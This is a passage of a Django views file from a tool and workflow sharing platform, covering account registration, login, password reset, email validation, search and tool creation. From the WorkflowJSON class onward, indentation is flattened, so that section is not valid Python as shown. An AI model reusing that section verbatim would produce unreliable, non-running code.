    return '{}://{}/platform'.format(scheme, host)
def get_execution_clients(request):
    '''
    All execution clients registered by the logged-in user
    (empty list for anonymous users).
    '''
    if request.user.is_anonymous:
        return []
    obc_user = OBC_user.objects.get(user=request.user)
    return list(obc_user.clients.values('client', 'name'))
def get_execution_clients_angular(request):
    '''
    Execution clients plus the trailing empty entry that the Angular UI expects.
    '''
    clients = get_execution_clients(request)
    clients.append({'name': '', 'client': ''})
    return clients
### END OF USERS
def index(request, **kwargs):
    '''
    Main entry view (url: '').

    Renders the single-page application template. kwargs may carry a
    deep-link target (tool / workflow / reference / user / comment / report);
    when the target exists, it is serialized into init_interlink_args so the
    frontend opens it on load, otherwise an alert message is shown. Also
    handles email-validation and password-reset tokens arriving as GET
    parameters, and injects instance/debug settings into the template.
    '''
    #print ('kwargs')
    #print (kwargs)
    context = {}
    context['general_alert_message'] = ''
    context['general_success_message'] = ''
    # Are we linking to a specific RO?
    init_interlink_args = {}
    # tool linking
    tool_name = kwargs.get('tool_name', '')
    tool_version = kwargs.get('tool_version', '')
    tool_edit = kwargs.get('tool_edit', 0)
    if tool_name and tool_version and tool_edit:
        if Tool.objects.filter(name=tool_name, version=tool_version, edit=int(tool_edit)).exists():
            init_interlink_args = {
                'type': 't',
                'name': tool_name,
                'version': tool_version,
                'edit': int(tool_edit),
            }
        else:
            context['general_alert_message'] = 'Tool {}/{}/{} does not exist'.format(tool_name, tool_version, tool_edit)
    # workflow linking
    workflow_name = kwargs.get('workflow_name', '')
    workflow_edit = kwargs.get('workflow_edit', 0)
    if workflow_name and workflow_edit:
        if Workflow.objects.filter(name=workflow_name, edit=int(workflow_edit)).exists():
            init_interlink_args = {
                'type': 'w',
                'name': workflow_name,
                'edit': int(workflow_edit),
            }
        else:
            context['general_alert_message'] = 'Workflow {}/{} does not exist'.format(workflow_name, workflow_edit)
    #references linking
    reference_name = kwargs.get('reference_name', '')
    if reference_name:
        if Reference.objects.filter(name__iexact=reference_name).exists():
            init_interlink_args = {
                'type': 'r',
                'name': reference_name,
            }
        else:
            context['general_alert_message'] = 'Reference {} does not exist'.format(reference_name)
    # user linking
    user_username = kwargs.get('user_username', '')
    if user_username:
        if OBC_user.objects.filter(user__username=user_username).exists():
            init_interlink_args = {
                'type': 'u',
                'username': user_username,
            }
        else:
            context['general_alert_message'] = 'User {} does not exist'.format(user_username)
    # comment link
    comment_id = kwargs.get('comment_id', '')
    if comment_id:
        if Comment.objects.filter(pk=int(comment_id)).exists():
            init_interlink_args = {
                'type': 'c',
                'id': int(comment_id),
            }
        else:
            context['general_alert_message'] = 'Comment with id={} does not exist'.format(comment_id)
    # Report link
    report_run = kwargs.get('report_run', '')
    if report_run:
        if Report.objects.filter(nice_id=report_run).exists():
            init_interlink_args = {
                'type': 'report',
                'run': report_run,
            }
        else:
            context['general_alert_message'] = 'Report {} does not exist'.format(report_run)
    context['init_interlink_args'] = simplejson.dumps(init_interlink_args)
    # Is this user already logged in?
    # https://stackoverflow.com/questions/4642596/how-do-i-check-whether-this-user-is-anonymous-or-actually-a-user-on-my-system
    if request.user.is_anonymous:
        #print ('User is anonumous')
        username = ''
    else:
        username = request.user.username
        #print ('Username: {}'.format(username))
    context['username'] = username
    context['password_reset_token'] = ''
    context['reset_signup_username'] = ''
    context['reset_signup_email'] = ''
    #Check for GET variables
    GET = request.GET
    # EMAIL VALIDATION
    validation_token = GET.get('validation_token', '')
    if validation_token:
        validation_success, validation_message = validate_user(validation_token)
        if validation_success:
            context['general_success_message'] = validation_message
        else:
            context['general_alert_message'] = validation_message
    #Is user validated
    context['user_is_validated'] = user_is_validated(request)
    # PASSWORD RESET
    password_reset_token = GET.get('password_reset_token', '')
    context['password_reset_token'] = '' # It will be set after checks
    if password_reset_token:
        password_reset_check_success, password_reset_check_message, obc_user = password_reset_check_token(password_reset_token)
        if password_reset_check_success:
            context['password_reset_token'] = password_reset_token
            context['reset_signup_username'] = obc_user.user.username
            context['reset_signup_email'] = obc_user.user.email
        else:
            context['general_alert_message'] = password_reset_check_message
    # Show warning when running in default Django port
    port = int(request.META['SERVER_PORT'])
    if settings.DEBUG:
        # Running with DEBUG True
        if port == 8000:
            logger.warning('WARNING: YOU ARE RUNNING IN DEFAULT DJANGO PORT (8000)')
        if port != g['DEFAULT_DEBUG_PORT']:
            logger.warning(f'WARNING: You are not runining on port {g["DEFAULT_DEBUG_PORT"]}')
    context['debug'] = settings.DEBUG # If this is True, then we include tests.js
    # Add port information or other instance settings on template
    instance_settings = get_instance_settings()
    context['port'] = instance_settings['port']
    context['controller_url'] = instance_settings['controller_url']
    # Get OS choices
    context['os_choices'] = simplejson.dumps(OS_types.get_angular_model());
    # Get User clients
    context['profile_clients'] = get_execution_clients_angular(request)
    # Add version
    context['version'] = __version__
    return render(request, 'app/index.html', context)
@has_data
def register(request, **kwargs):
    '''
    View url: 'register/'

    Create a new user account: validate the submitted username / password /
    email, send a validation email, and create the User + OBC_user records.
    Returns fail(message) on the first validation error, success() otherwise.
    '''
    if 'signup_username' not in kwargs:
        return fail('username is required')
    signup_username = kwargs['signup_username']
    # NOTE: \w also allows underscores and digits, which is intended here.
    if not re.match(r'^\w+$', signup_username):
        return fail('username can only contain alphanumeric characters')
    if username_exists(signup_username):
        return fail('username: {} exists already'.format(signup_username))
    if 'signup_password' not in kwargs:
        return fail('password is required')
    signup_password = kwargs['signup_password']
    check_password_success, check_password_message = check_password(signup_password)
    if not check_password_success:
        return fail(check_password_message)
    if 'signup_confirm_password' not in kwargs:
        return fail('confirm password is required')
    signup_confirm_password = kwargs['signup_confirm_password']
    if signup_password != signup_confirm_password:
        return fail('Confirm password does not match password')
    if 'signup_email' not in kwargs:
        return fail('email is required')
    signup_email = kwargs['signup_email'] # https://www.tecmint.com/setup-postfix-mail-server-in-ubuntu-debian/
    # We do not allow two users with the same email address.
    # filter().exists() instead of get() also avoids a MultipleObjectsReturned
    # 500 in case duplicate emails already slipped into the database.
    if OBC_user.objects.filter(user__email=signup_email).exists():
        return fail('A user with this email already exists')
    # Send the validation email first: do not create the user if mailing fails.
    suc, error_message, uuid_token = send_validation_email_inner(request, signup_email)
    if not suc:
        return fail(error_message)
    # Create user. last_login must be set explicitly:
    # https://stackoverflow.com/questions/33683619/null-value-in-column-last-login-violates-not-null-constraint/42502311
    user = User.objects.create_user(signup_username, signup_email, signup_password, last_login=now())
    # Create OBC_user.
    # If we are running in DEBUG, new users are auto-validated (no mail service
    # is needed on a testing platform). In production, new users must confirm
    # their email first.
    obc_user = OBC_user(user=user, email_validated=bool(settings.DEBUG), email_validation_token=uuid_token)
    obc_user.save()
    return success()
@has_data
def reset_password_email(request, **kwargs):
    '''
    Start a password reset: store a fresh token (with timestamp) on the
    user's OBC_user record and email a reset link to the given address.
    '''
    if 'reset_password_email' not in kwargs:
        return fail('Please enter an email')
    email = kwargs['reset_password_email']
    # Look up the account owning this email; reject unknown addresses.
    try:
        obc_user = OBC_user.objects.get(user__email=email)
    except ObjectDoesNotExist:
        return fail('This email does not belong to any user') # Isn't this a breach of privacy?
    # Persist the reset token together with when it was issued.
    token = create_uuid_token()
    obc_user.password_reset_token = token
    obc_user.password_reset_timestamp = now()
    obc_user.save()
    # Mail the reset link with Django's send_mail.
    try:
        send_mail(
            '[{server}] Reset your password'.format(server=g['SERVER']), # subject
            reset_password_email_body(token, port=request_port_to_url(request)), # body message
            g['EMAIL'], # from
            [email], # to
        )
    except Exception as e:
        return fail('Could not send email to {email}. Please contact {ADMIN}'.format(email=email, ADMIN=g['ADMIN']))
    return success()
@has_data
def password_reset(request, **kwargs):
    '''
    Complete a password reset: validate the new password, set it on the
    user that owns the reset token, and invalidate the token.
    '''
    if 'password_reset_password' not in kwargs:
        return fail('password is required')
    password_reset_password = kwargs['password_reset_password']
    if 'password_reset_confirm_password' not in kwargs:
        return fail('confirm password is required')
    password_reset_confirm_password = kwargs['password_reset_confirm_password']
    if password_reset_password != password_reset_confirm_password:
        return fail('Confirm password does not match password')
    check_password_success, check_password_message = check_password(password_reset_password)
    if not check_password_success:
        return fail(check_password_message)
    # The token should always be present in kwargs, but guard anyway so a
    # forged or stale request yields a friendly error instead of a 500.
    password_reset_token = kwargs.get('password_reset_token')
    if not password_reset_token:
        return fail('password reset token is required')
    try:
        obc_user = OBC_user.objects.get(password_reset_token=password_reset_token)
    except ObjectDoesNotExist:
        return fail('Invalid password reset token')
    # Change the password. https://docs.djangoproject.com/en/2.1/topics/auth/default/
    user = obc_user.user
    user.set_password(password_reset_password)
    user.save()
    # Invalidate the token so the link cannot be reused.
    obc_user.password_reset_token = None
    obc_user.save()
    return success()
@has_data
def send_validation_email(request, **kwargs):
    '''
    url: send_validation_email/

    Re-send the email-validation mail to the logged-in user and store the
    new validation token on their OBC_user record.
    '''
    # Both of these failures should never happen for a well-behaved client.
    if request.user.is_anonymous:
        return fail('Error 8912')
    try:
        obc_user = OBC_user.objects.get(user=request.user)
    except ObjectDoesNotExist:
        return fail('Error 8711')
    email = request.user.email
    suc, error_message, uuid_token = send_validation_email_inner(request, email)
    if not suc:
        return fail(error_message)
    # Remember the token so the link in the mail can be checked later.
    obc_user.email_validation_token = uuid_token
    obc_user.save()
    return success({'email': request.user.email})
@has_data
def login(request, **kwargs):
    '''
    View url: 'login/'

    Authenticate the user and open a Django session. Returns the fresh
    CSRF token plus per-user UI data.
    '''
    if 'login_username' not in kwargs:
        return fail('username is required')
    login_username = kwargs['login_username']
    if 'login_password' not in kwargs:
        return fail('password is required')
    login_password = kwargs['login_password']
    user = authenticate(username=login_username, password=login_password)
    if user is None:
        return fail('Invalid username or password')
    django_login(request, user)
    obc_user = OBC_user.objects.get(user=user)
    # Logging in rotates the CSRF token, so hand the new one to the client.
    return success({
        'username': login_username,
        'csrf_token': get_token(request),
        'user_is_validated': obc_user.email_validated,
        'profile_clients': get_execution_clients_angular(request),
    })
def logout(request):
    '''
    View url: 'logout/'
    This is NOT called by AJAX: it closes the Django session and issues a
    full redirect back to the platform index page.
    '''
    django_logout(request)
    return redirect('/platform/')
#def user_data_get(request):
# '''
# View url: user_data_get
# GET THE DATA OF THE LOGGED-IN USER
# It does not have the @has_data decorator because it has.. no data
# '''
#
# user = request.user
# obc_user = OBC_user.objects.get(user=user)
# ret = {
# 'user_first_name': obc_user.first_name,
# 'user_last_name': obc_user.last_name,
# 'user_email': user.email,
# 'user_website': obc_user.website,
# 'user_public_info': obc_user.public_info,
# }
#
# return success(ret)
#@has_data
#def user_data_set(request, **kwargs):
# '''
# Deprecated
# '''
# user = request.user
# obc_user = OBC_user.objects.get(user=user)
#
# obc_user.first_name = None_if_empty_or_nonexisting(kwargs, 'user_first_name')
# obc_user.last_name = None_if_empty_or_nonexisting(kwargs, 'user_last_name')
# obc_user.website = None_if_empty_or_nonexisting(kwargs, 'user_website')
# obc_user.public_info = None_if_empty_or_nonexisting(kwargs, 'user_public_info')
#
# obc_user.save()
#
# return success()
@has_data
def tools_search_1(request, **kwargs):
    '''
    Get tool counts
    NOT CURRENTLY USED!
    '''
    # Only the totals are reported; no filtering is applied.
    return success({
        'tools_search_tools_number': Tool.objects.count(),
        'workflows_search_tools_number': Workflow.objects.count(),
    })
def tools_search_2(tools_search_name, tools_search_version, tools_search_edit):
    '''
    This is triggered when there is a key-change on the main-search

    Build Q filters from the (possibly empty) search fields, query the Tool
    table and return the matches as a jstree model plus their count.
    '''
    Qs = []
    if tools_search_name:
        # Match on the tool name OR on the username of its creator.
        Q1 = Q(name__icontains=tools_search_name)
        Q2 = Q(obc_user__user__username__icontains=tools_search_name)
        Qs.append(Q1 | Q2)
    if tools_search_version:
        Qs.append(Q(version__icontains=tools_search_version))
    if tools_search_edit:
        # A non-numeric edit value cannot match anything; ignore it instead
        # of letting int() raise ValueError (a 500 on every keystroke).
        try:
            Qs.append(Q(edit=int(tools_search_edit)))
        except (TypeError, ValueError):
            pass
    # Multiple positional Qs apply an AND operator. https://docs.djangoproject.com/en/2.2/topics/db/queries/#complex-lookups-with-q-objects
    # For the order_by part see issue #120
    results = Tool.objects.filter(*Qs).order_by('created_at')
    # Build JS TREE structure, e.g.
    # { id : 'ajson1', parent : '#', text : 'KARAPIPERIM', state: { opened: true} }
    tools_search_jstree = []
    for x in results:
        tools_search_jstree.append({
            'data': {'name': x.name, 'version': x.version, 'edit': x.edit},
            'text': tool_node_jstree(x),
            'id': tool_id_jstree(x, g['SEARCH_TOOL_TREE_ID']),
            # Forked tools hang under their origin; everything else is a root ('#').
            'parent': tool_id_jstree(x.forked_from, g['SEARCH_TOOL_TREE_ID']) if x.forked_from else '#',
            'state': {'opened': True},
        })
    return {
        'tools_search_tools_number': results.count(),
        'tools_search_jstree': tools_search_jstree,
    }
def workflows_search_2(workflows_search_name, workflows_search_edit):
    '''
    Called by all_search_2

    Build Q filters from the (possibly empty) search fields, query the
    Workflow table and return the matches as a jstree model plus their count.
    '''
    Qs = []
    if workflows_search_name:
        # Match on the workflow name OR on the username of its creator.
        Q1 = Q(name__icontains=workflows_search_name)
        Q2 = Q(obc_user__user__username__icontains=workflows_search_name)
        Qs.append(Q1 | Q2)
    if workflows_search_edit:
        # A non-numeric edit value cannot match anything; ignore it instead
        # of letting int() raise ValueError (a 500 on every keystroke).
        try:
            Qs.append(Q(edit=int(workflows_search_edit)))
        except (TypeError, ValueError):
            pass
    # For the order_by part see issue #120
    results = Workflow.objects.filter(*Qs).order_by('created_at')
    # Build JS TREE structure
    workflows_search_jstree = []
    for x in results:
        workflows_search_jstree.append({
            'data': {'name': x.name, 'edit': x.edit},
            'text': workflow_node_jstree(x),
            'id': workflow_id_jstree(x, g['SEARCH_WORKFLOW_TREE_ID']),
            # Forked workflows hang under their origin; everything else is a root ('#').
            'parent': workflow_id_jstree(x.forked_from, g['SEARCH_WORKFLOW_TREE_ID']) if x.forked_from else '#',
            'state': {'opened': True},
        })
    return {
        'workflows_search_tools_number': results.count(),
        'workflows_search_jstree': workflows_search_jstree,
    }
@has_data
def tools_search_3(request, **kwargs):
    '''
    Triggered when a tool is clicked on the tool-search-jstree

    Collects everything the UI needs to render the tool's detail panel:
    metadata, dependency/variable jstree models, OS choices, last-validation
    results, the comment (Q&A) thread and the requesting user's vote state.
    '''
    tool_name = kwargs.get('tool_name', '')
    tool_version = kwargs.get('tool_version', '')
    tool_edit = int(kwargs.get('tool_edit', -1))
    # Name and version are matched case-insensitively; edit must be exact.
    tool = Tool.objects.get(name__iexact=tool_name, version__iexact=tool_version, edit=tool_edit)
    #Get the dependencies of this tool and build a JSTREE
    tool_dependencies_jstree = []
    for dependency in tool.dependencies.all():
        dependency_js_tree = tool_build_dependencies_jstree(tool_get_dependencies_internal(dependency, include_as_root=True))
        tool_dependencies_jstree.extend(dependency_js_tree)
    #Get the dependencies of this tool AND the variables and build a JSTREE
    #FIXME: Duplicate code
    tool_variables_jstree = []
    for dependency in tool.dependencies.all():
        variables_js_tree = tool_build_dependencies_jstree(tool_get_dependencies_internal(dependency, include_as_root=True), add_variables=True)
        tool_variables_jstree.extend(variables_js_tree)
    #print ('LOGGG DEPENDENIES + VARIABLES')
    #print (tool_variables_jstree)
    #print (simplejson.dumps(tool_variables_jstree, indent=4))
    #Get the variables of this tool
    tool_variables = []
    for variable in tool.variables.all():
        tool_variables.append({'name': variable.name, 'value': variable.value, 'description': variable.description})
    # Get obc_user (None for anonymous visitors)
    if request.user.is_anonymous:
        obc_user = None
    else:
        obc_user = OBC_user.objects.get(user=request.user)
    #Is it voted by the requesting user?
    if obc_user:
        try:
            v = UpDownToolVote.objects.get(obc_user=obc_user, tool=tool)
        except ObjectDoesNotExist as e:
            # It is not voted
            tool_voted = {'up': False, 'down': False}
        else:
            # It is voted: a single vote object records up OR down
            tool_voted = {'up': v.upvote, 'down': not v.upvote}
    else:
        tool_voted = {'up': False, 'down': False}
    ret = {
        'website': tool.website,
        'description': tool.description,
        'description_html': tool.description_html,
        'username': tool.obc_user.user.username,
        'created_at': datetime_to_str(tool.created_at),
        'forked_from': tool_to_json(tool.forked_from),
        'changes': tool.changes,
        'tool_keywords': [keyword.keyword for keyword in tool.keywords.all()],
        'dependencies_jstree': tool_dependencies_jstree,
        'variables_js_tree': tool_variables_jstree,
        'variables': tool_variables,
        'tool_os_choices': OS_types.get_angular_model([x.os_choices for x in tool.os_choices.all()]),
        'installation_commands': tool.installation_commands,
        'validation_commands': tool.validation_commands,
        'validation_status': tool.last_validation.validation_status if tool.last_validation else 'Unvalidated',
        # Show stdout, stderr and error code when the tool is clicked on the tool-search-jstree
        'stdout' : tool.last_validation.stdout if tool.last_validation else None,
        'stderr' : tool.last_validation.stderr if tool.last_validation else None,
        'errcode' : tool.last_validation.errcode if tool.last_validation else None,
        'validation_created_at' : datetime_to_str(tool.last_validation.created_at) if tool.last_validation else None,
        'tool_pk': tool.pk, # Used in comments
        'tool_thread': qa_create_thread(tool.comment, obc_user), # Tool comment thread. This is a list
        'tool_score': tool.upvotes - tool.downvotes,
        'tool_voted': tool_voted,
        'tool_comment_id': tool.comment.pk, # Used to create a permalink to the comments
        'tool_comment_title': tool.comment.title,
        'tool_comment_created_at': datetime_to_str(tool.comment.created_at),
        'tool_comment_username': tool.comment.obc_user.user.username,
        'draft': tool.draft,
    }
    #print ('LOGGG DEPENDENCIES + VARIABLES')
    #print (simplejson.dumps(tool_variables_jstree, indent=4))
    return success(ret)
@has_data
def tool_get_dependencies(request, **kwargs):
    '''
    Get the dependencies of this tool
    Called when a stop event (from dnd) happens from search JSTREE to the dependencies JSTREE
    OR from a stop event from search jstree to cytoscape graph
    what_to_do == 1: drag and drop FROM SEARCH TREE TO DEPENDENCY TREE
    what_to_do == 2: drag and drop FROM SEARCH TREE TO CYTOSCAPE CYWORKFLOW DIV
    '''
    tool_name = kwargs.get('tool_name', '')
    tool_version = kwargs.get('tool_version', '')
    tool_edit = int(kwargs.get('tool_edit', -1))
    what_to_do = kwargs.get('what_to_do', None)
    if not what_to_do:
        return fail('Error 9122')
    try:
        what_to_do = int(what_to_do)
    except ValueError:
        return fail('Error 9123')
    tool = Tool.objects.get(name=tool_name, version=tool_version, edit=tool_edit)
    # Collect the tool's dependency graph once, then render it as two
    # jstree models: a plain one, and one that includes the tool variables.
    dependencies = tool_get_dependencies_internal(tool, include_as_root=True)
    dependencies_jstree = tool_build_dependencies_jstree(dependencies, add_installation_commands=(what_to_do == 2))
    variables_jstree = tool_build_dependencies_jstree(dependencies, add_variables=True)
    # There is $scope.tools_dep_jstree_model and $scope.tools_var_jstree_model
    return success({
        'dependencies_jstree': dependencies_jstree,
        'variables_jstree': variables_jstree,
    })
def validate_toast_button():
    '''
    Build the HTML for the "Validate" toast button.
    This button should be similar with the one generated from angular.
    '''
    markup = (
        '<button class="waves-effect waves-light btn red lighten-3 black-text" '
        'onclick="window.OBCUI.send_validation_mail()">Validate</button>'
    )
    return markup
@has_data
def tools_add(request, **kwargs):
    '''
    Add a new tool
    tool add tool save tool . Create tool
    * names and version is searched case insensitive

    When tool_edit_state is True we are SAVING an existing edit: the old
    Tool row is deleted and re-created with the same edit number, and its
    comment thread, votes, forks, dependants, creation date and workflow
    links are carried over to the new row. Otherwise a brand new edit is
    created. Returns fail(message) on validation errors, success(ret) with
    data for the UI otherwise.
    '''
    if request.user.is_anonymous: # Server should always check..
        return fail('Please login to create new tools')
    if not user_is_validated(request):
        return fail('Please validate your email to create new tools ' + validate_toast_button())
    obc_user = OBC_user.objects.get(user=request.user)
    tool_website = kwargs.get('tool_website', '')
    #if not tool_website:
    #    return fail('Website cannot be empty') # Website CAN be empty
    if tool_website:
        if not valid_url(tool_website):
            return fail('Website is not a valid URL')
    tool_description = kwargs.get('tool_description', '')
    if not tool_description:
        return fail('Description cannot be empty')
    tool_description_html = markdown(tool_description)
    tools_search_name = kwargs.get('tools_search_name', '')
    if not tools_search_name:
        return fail('Invalid name')
    tools_search_version = kwargs.get('tools_search_version', '')
    if not tools_search_version:
        return fail('Invalid version')
    tool_edit_state = kwargs.get('tool_edit_state', '')
    # Must be a real boolean coming from the client JSON, not a string.
    if not type(tool_edit_state) is bool:
        return fail('Error 8715')
    upvoted = False
    downvoted = False
    tool_forked_from = None
    tool_changes = None
    if tool_edit_state:
        # We are editing this tool!
        # Get the edit of the tool
        tools_search_edit = kwargs.get('tools_search_edit', '')
        if not tools_search_edit:
            return fail('Invalid tool edit number. Error 8712')
        try:
            tools_search_edit = int(tools_search_edit)
        except ValueError as e:
            return fail('Invalid tool edit number. Error 8713')
        except Exception as e:
            return fail('Invalid tool edit number. Error 8714')
        # Delete the previous object!
        try:
            tool = Tool.objects.get(name=tools_search_name, version=tools_search_version, edit=tools_search_edit)
        except ObjectDoesNotExist as e:
            return fail('Error 8716')
        # Check that the user who created this tool is the one who deletes it!
        if tool.obc_user != obc_user:
            return fail('Error 8717') # This is strange.. The user who edits this tool is not the one who created it???
        # Store a reference to the comment (re-attached to the new tool later)
        comment = tool.comment
        # Store upvotes/downvotes
        upvotes = tool.upvotes
        downvotes = tool.downvotes
        # Store vote objects
        votes = UpDownToolVote.objects.filter(tool=tool)
        # Disassociate from this tool (this is allowed because null=true)
        for vote in votes:
            if vote.obc_user == obc_user:
                # Remember the editing user's own vote for the response payload
                upvoted = vote.upvote
                downvoted = not upvoted
            vote.tool = None
            vote.save()
        # Get the tools that are forks of this tool
        tool_forks = Tool.objects.filter(forked_from=tool)
        # Temporary set that these tools are not forked from any tool
        for tool_fork in tool_forks:
            tool_fork.forked_from = None
            tool_fork.save()
        # Get the tool that this tool is forked from
        tool_forked_from = tool.forked_from
        # Get the tools that depend from this tool
        tools_depending_from_me = tool.dependencies_related.all()
        tools_depending_from_me_list = list(tools_depending_from_me) # We need to add a reference to these object. Otherwise it will be cleared after we delete tool
        # Get the created at. It needs to be sorted according to this, otherwise the jstree becomes messy
        tool_created_at = tool.created_at
        # Get the workflows that use this tool
        workflows_using_this_tool = Workflow.objects.filter(tools__in = [tool])
        # Remove this tool from these workflows
        # NOTE(review): iterating evaluates (and caches) this queryset; the
        # re-use after tool.delete() below relies on that cached result.
        for workflow_using_this_tool in workflows_using_this_tool:
            workflow_using_this_tool.tools.remove(tool)
            workflow_using_this_tool.save()
        # Delete it!
        tool.delete()
    else:
        upvotes = 0
        downvotes = 0
    #os_type Update
    tool_os_choices = kwargs.get('tool_os_choices',[])
    if not tool_os_choices:
        return fail('Please select at least one operating system')
    #print ('Operating Systems:')
    #print (tool_os_choices)
    # If we are editing this tool, set the same edit number
    # Otherwise get the maximum edit
    if tool_edit_state:
        next_edit = tools_search_edit
    else:
        #Get the maximum edit
        tool_all = Tool.objects.filter(name__iexact=tools_search_name, version__iexact=tools_search_version) # https://docs.djangoproject.com/en/dev/ref/models/querysets/#std:fieldlookup-iexact
        if not tool_all.exists():
            next_edit = 1
        else:
            max_edit = tool_all.aggregate(Max('edit'))
            next_edit = max_edit['edit__max'] + 1
    # Get forked from and edit summary
    tool_forked_from_info = kwargs.get('tool_forked_from', None)
    if tool_forked_from_info:
        tool_forked_from = Tool.objects.get(name=tool_forked_from_info['name'], version=tool_forked_from_info['version'], edit=int(tool_forked_from_info['edit']))
        tool_changes = kwargs.get('tool_changes', '')
        if not tool_changes:
            return fail('Edit summary cannot be empty')
    else:
        pass # Do nothing
    #Installation/Validation commands
    tool_installation_commands = kwargs['tool_installation_commands']
    tool_validation_commands = kwargs['tool_validation_commands']
    #Dependencies
    tool_dependencies = kwargs['tool_dependencies']
    # FIXME! What if a dependency is deleted???
    tool_dependencies_objects = [Tool.objects.get(name=t['name'], version=t['version'], edit=int(t['edit'])) for t in tool_dependencies]
    #Variables
    tool_variables = kwargs['tool_variables']
    tool_variables = [x for x in tool_variables if x['name'] and x['value'] and x['description']] # Filter out empty fields
    # Check that variables do not have the same name
    for variable_name, variable_name_counter in Counter([x['name'] for x in tool_variables]).items():
        if variable_name_counter>1:
            return fail('Two variables cannot have the same name!')
    #Create new tool
    new_tool = Tool(
        obc_user= obc_user,
        name = tools_search_name,
        version=tools_search_version,
        edit=next_edit,
        website = tool_website,
        description = tool_description,
        description_html = tool_description_html,
        forked_from = tool_forked_from,
        changes = tool_changes,
        installation_commands=tool_installation_commands,
        validation_commands=tool_validation_commands,
        upvotes = upvotes,
        downvotes = downvotes,
        draft = True, # By default all new tools are draft
        last_validation=None,
    )
    #Save it
    new_tool.save()
    if tool_edit_state:
        # Preserve the created at date. We have to do that AFTER the save! https://stackoverflow.com/questions/7499767/temporarily-disable-auto-now-auto-now-add
        # If we do not preserve the created at, then the jstree becomes messy.
        new_tool.created_at = tool_created_at
        new_tool.save()
    #Add dependencies
    if tool_dependencies_objects:
        new_tool.dependencies.add(*tool_dependencies_objects)
        new_tool.save()
    #Add Variables
    if tool_variables:
        variable_objects = []
        for variable in tool_variables:
            variable_object = Variables(name=variable['name'], value=variable['value'], description=variable['description'], tool=new_tool)
            variable_object.save()
            variable_objects.append(variable_object)
        new_tool.variables.add(*variable_objects)
        new_tool.save()
    #Add os type
    for tool_os_choice in tool_os_choices:
        OS_types_obj, created = OS_types.objects.get_or_create(os_choices=tool_os_choice['value'])
        new_tool.os_choices.add(OS_types_obj)
    new_tool.save()
    #Add keywords
    keywords = [Keyword.objects.get_or_create(keyword=keyword)[0] for keyword in kwargs['tool_keywords']]
    new_tool.keywords.add(*keywords)
    new_tool.save()
    if tool_edit_state:
        # Add the votes from the previous edit
        for vote in votes:
            vote.tool = new_tool
            vote.save()
        # Add the tools that were forked from this tool (that was deleted before) to the new tool
        for tool_fork in tool_forks:
            tool_fork.forked_from = new_tool
            tool_fork.save()
        # To the tools depending from me, add this tool to dependencies!
        for tool_depending_from_me in tools_depending_from_me_list:
            tool_depending_from_me.dependencies.add(new_tool)
            #print ('Add {} as a dependency to {}'.format(new_tool, tool_depending_from_me))
            tool_depending_from_me.save()
        # Add to the workflows that were using this tool, the new tool
        for workflow_using_this_tool in workflows_using_this_tool:
            workflow_using_this_tool.tools.add(new_tool)
            workflow_using_this_tool.save()
        # Update the json graph of the workflows using this tool
        WJ = WorkflowJSON()
        WJ.update_tool(new_tool)
    else:
        #Add an empty comment. This will be the root comment for the QA thread
        comment = Comment(
            obc_user = OBC_user.objects.get(user=request.user),
            comment = '',
            comment_html = '',
            title = markdown('Discussion on Tool: t/{}/{}/{}'.format(tools_search_name, tools_search_version, next_edit)),
            parent = None,
            upvotes = 0,
            downvotes = 0,
        )
        comment.save()
    new_tool.comment = comment
    new_tool.save()
    ret = {
        'description_html': tool_description_html,
        'edit': next_edit,
        'created_at': datetime_to_str(new_tool.created_at),
        'tool_pk': new_tool.pk, # Used in comments
        'tool_thread': qa_create_thread(new_tool.comment, obc_user), # Tool comment thread
        'score': upvotes-downvotes,
        'voted': {'up': upvoted, 'down': downvoted},
    }
    return success(ret)
class WorkflowJSON:
'''
Basically a function collection for dealing with the workflow json object
'''
    def update_workflow(self, workflow):
        '''
        workflow is a database Workflow object.

        Load the workflow's stored cytoscape graph and the workflows that
        embed it, then delegate to __update_workflow (not visible here —
        presumably it rewrites the embedding workflows' graphs; confirm).
        '''
        self.workflow = workflow
        # Cytoscape id of this workflow's node as it appears in other graphs.
        self.key = workflow_id_cytoscape(self.workflow, None, None)
        # The workflow's own cytoscape graph, stored as JSON on the model.
        self.graph = simplejson.loads(self.workflow.workflow)
        self.all_ids = {node['data']['id'] for node in self.graph['elements']['nodes']} # All node ids
        # Workflows that embed this workflow as a sub-workflow.
        self.workflows_using_me = Workflow.objects.filter(workflows__in = [self.workflow])
        self.belongto, self.workflow_nodes = self.__build_workflow_belongto(self.graph)
        self.__update_workflow()
    def update_tool(self, tool):
        '''
        tool is a database Tool object.

        Rebuild the tool's dependency graph and find the workflows that use
        it, then delegate to __update_tool (not visible here — presumably it
        refreshes those workflows' stored graphs; confirm).
        '''
        self.tool = tool
        # The tool plus all its (transitive) dependencies as a cytoscape graph.
        self.graph = self.__create_cytoscape_graph_from_tool_dependencies(self.tool)
        self.all_ids = {node['data']['id'] for node in self.graph['elements']['nodes']} # All node ids
        # Workflows that reference this tool.
        self.workflows_using_me = Workflow.objects.filter(tools__in = [self.tool])
        self.key = tool_id_cytoscape(self.tool)
        self.__update_tool()
def __iter_workflows(self, graph):
'''
'''
for element in graph['elements']['nodes']:
if element['data']['type'] == 'workflow':
yield element
def __build_workflow_belongto(self, graph):
'''
Create dictionaries:
self.belongto
Keys: workflow tuple (name, edit)
Value: The workflow element where this workflow belongs to
self.workflow_nodes
Keys: workflow tuple
Value: The workflow element
'''
all_workflows = list(self.__iter_workflows(graph))
workflow_nodes = {workflow_element['data']['id'] : workflow_element for workflow_element in all_workflows}
belongto = {}
for workflow_element in all_workflows:
workflow_key = workflow_element['data']['id']
if workflow_element['data']['belongto']:
belongto[workflow_key] = workflow_nodes[workflow_id_cytoscape(workflow_element['data']['belongto'], None, None)]
else:
belongto[workflow_key] = None
return belongto, workflow_nodes
def __build_edges_dict(self, graph):
'''
Create a dictionary 's': source, 't': target
Keys are node ids
Values are a set containing all the nodes that there is an edge
'''
ret = {
's' : defaultdict(set),
't' : defaultdict(set),
}
for edge in graph['elements']['edges']:
ret['s'][edge['data']['source']].add(edge['data']['target'])
ret['t'][edge['data']['target']].add(edge['data']['source'])
return ret
def __tool_dependencies(self, tool_node, all_nodes, edges):
'''
Edge A --> B: Tool A has dependency B . Or else, A depends from B. Or else first install B then A
Return a set of all tool ids that belong to the dependencies of a tool (tool_node)
tool_node: The tool node in a workflow cy
all_nodes: A list of all nodes of a workflow cy
edges: The object returned from self.__build_edges_dict
'''
ret = set()
#print ('tool_node:', tool_node)
#print ('Edge set:', edges)
def recurse(rec_tool_node):
tool_id = rec_tool_node['data']['id']
for target_id in edges['s'][tool_id]:
